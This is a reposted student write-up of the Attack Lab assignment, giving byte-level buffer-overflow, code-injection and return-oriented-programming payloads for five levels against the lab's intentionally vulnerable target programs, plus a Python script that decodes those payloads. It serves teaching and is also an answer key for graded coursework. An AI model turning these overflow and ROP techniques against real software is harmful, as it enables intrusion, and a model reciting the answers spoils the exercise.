【LittleXi】Attacklab

Level 1

Task summary: exploit the buffer overflow so that when test calls getbuf, control does not return to test but to touch1 instead.

Approach: using the buffer overflow, we keep feeding input until the whole yellow region (getbuf's buffer, shown in yellow in the original figure) is filled, then continue with the address of touch1. getbuf's saved return address is overwritten with touch1's address, and touch1 is called when getbuf returns.

Answer:

00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 
86 5e 55 55 55 55 00 00 

Level 2

Task summary: similar to Level 1, again exploiting the buffer overflow: when test calls getbuf, control should not return to test but to touch2, and before returning to touch2 the argument of touch2 must be set to the cookie.

Approach: using the buffer overflow, we fill the whole yellow region, then continue with the address held in the stack pointer %rsp at the time the string is read, so that getbuf's return address is overwritten with that %rsp address. The injected assembly code then runs, sets %rdi, and rets to the address of touch2.

Notes: the %rsp address can be obtained by stepping in gdb to the point where the buffer is at the top of the stack and typing p /x $rsp to print it directly. The injection workflow is to hand-write the assembly first, then use the two commands

  • gcc -c example.s

  • objdump -d example.o > example.d

    to obtain the machine code of the program.

Answer:

48 c7 c7 56 db eb 76 48
b8 ba 5e 55 55 55 55 00
00 50 c3 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
78 a0 61 55 00 00 00 00

Level 3

Task summary: essentially the same as Level 2, except that the value placed in register %rdi must now be the address of a string.

Approach: we now need somewhere to store the string, and we may as well place it at the end of the input. Once control has transferred to the stack-top address, the injected code only needs to load the start address of the string into %rdi and return.

Answer:

48 8d 3c 24 48 b8 df 5f 
55 55 55 55 00 00 50 c3 
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
78 a0 61 55 00 00 00 00
37 36 65 62 64 62 35 36 00

Level 4

Task summary: this is the second phase of the lab. rtarget uses stack randomization and restricts which regions are executable in order to block the attack. The attacker's goal is to pass the cookie into touch2 and then call touch2.

Approach: disassemble rtarget directly and search it for the gadgets pop %rax and mov %rax,%rdi.

Answer:

00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
b4 60 55 55 55 55 00 00
56 db eb 76 00 00 00 00
df 60 55 55 55 55 00 00
ba 5e 55 55 55 55 00 00

Level 5

Task summary: the same as Level 3, except that the value cannot be passed directly.

Approach: combine the techniques of Level 3 and Level 4: first save the address in %rsp, then pass %rdi the address of the cookie string, which lies at an offset from %rsp.

Answer:

00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
34 62 55 55 55 55 00 00
df 60 55 55 55 55 00 00
85 58 55 55 55 55 00 00
30 00 00 00 00 00 00 00
f2 60 55 55 55 55 00 00
df 60 55 55 55 55 00 00
df 5f 55 55 55 55 00 00
37 36 65 62 64 62 35 36 00
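As an added example (not code from the original writeup), the following Python decodes an answer written in the hex-byte text format shown above and reports how it lands in getbuf's frame: the little-endian return address that replaces getbuf's saved return address (the mechanism described in Level 1), the qwords that later ret/pop instructions consume, and a trailing string such as the cookie in Levels 3 and 5. It assumes a 56-byte buffer, read off the seven filler rows of the Level 1 answer.

```python
import struct

# Assumption taken from the Level 1 answer above: 7 rows of 8 filler bytes precede
# the return address, so getbuf's buffer is 56 bytes.
BUFFER_SIZE = 56

def parse_hex(text):
    """Turn the 'xx xx ...' text form into raw bytes (what hex2raw does)."""
    return bytes(int(tok, 16) for tok in text.split())

def split_trailing_string(tail):
    """Peel a NUL-terminated printable ASCII string off the end of tail, if any.
    Heuristic: step back over the final NUL, then over printable bytes."""
    if not tail.endswith(b"\x00"):
        return tail, None
    i = len(tail) - 1
    while i > 0 and 0x20 <= tail[i - 1] <= 0x7E:
        i -= 1
    if i == len(tail) - 1:  # nothing printable before the NUL: no string here
        return tail, None
    return tail[:i], tail[i:-1].decode("ascii")

def layout(payload, buffer_size=BUFFER_SIZE):
    """Where the payload lands in getbuf's frame: the 8 bytes after the buffer
    overwrite the saved return address (little-endian), following qwords are
    what later ret/pop instructions consume, and a trailing string may follow."""
    if len(payload) < buffer_size + 8:
        raise ValueError("payload stops short of the saved return address")
    (ret,) = struct.unpack("<Q", payload[buffer_size:buffer_size + 8])
    rest, string = split_trailing_string(payload[buffer_size + 8:])
    if len(rest) % 8:
        raise ValueError("bytes after the return address are not whole qwords")
    qwords = [struct.unpack("<Q", rest[i:i + 8])[0] for i in range(0, len(rest), 8)]
    return {"ret": ret, "qwords": qwords, "string": string}

# Constructed input: the Level 5 answer from the writeup above (56 filler bytes,
# then the return address, six more qwords, and the cookie as a C string).
LEVEL5 = "00 " * BUFFER_SIZE + """
34 62 55 55 55 55 00 00
df 60 55 55 55 55 00 00
85 58 55 55 55 55 00 00
30 00 00 00 00 00 00 00
f2 60 55 55 55 55 00 00
df 60 55 55 55 55 00 00
df 5f 55 55 55 55 00 00
37 36 65 62 64 62 35 36 00
"""
```

Running layout(parse_hex(LEVEL5)) shows the return address 0x555555556234, the six qword values that follow, and the string "76ebdb56", which is the same cookie that the Level 4 answer stores as the raw qword 0x76ebdb56.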

Reposted from blog.csdn.net/qq_68591679/article/details/127628710